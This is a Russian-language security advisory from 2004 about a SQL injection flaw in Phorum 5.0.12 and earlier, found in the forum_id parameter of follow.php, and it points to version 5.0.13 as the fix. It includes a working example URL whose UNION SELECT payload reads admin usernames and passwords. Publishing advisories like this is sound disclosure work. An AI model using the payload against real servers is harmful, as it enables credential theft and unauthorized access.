SQL-инъекция в Phorum

Дата публикации:
15.11.2004
Всего просмотров:
1116
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Phorum 5.x
Уязвимые версии: Phorum 5.0.12 и более ранние версии

Описание:
Обнаружена уязвимость в Phorum. Удаленный атакующий может выполнить произвольный SQL команды на уязвимом сервере.

Уязвимость существует из-за некорректной фильтрации данных в параметре forum_id файла 'follow.php'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный SQL код на целевом сервере. Пример:

http://[target]/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT
%201%2c1%2c1%2 c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1
%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1

URL производителя: www.phorum.org

Решение: Установите обновление
http://phorum.org/downloads/phorum-5.0.13.tar.gz

Ссылки: Phorum Input Validation Hole in 'follow.php' Lets Remote Users Inject SQL Commands

или введите имя

CAPTCHA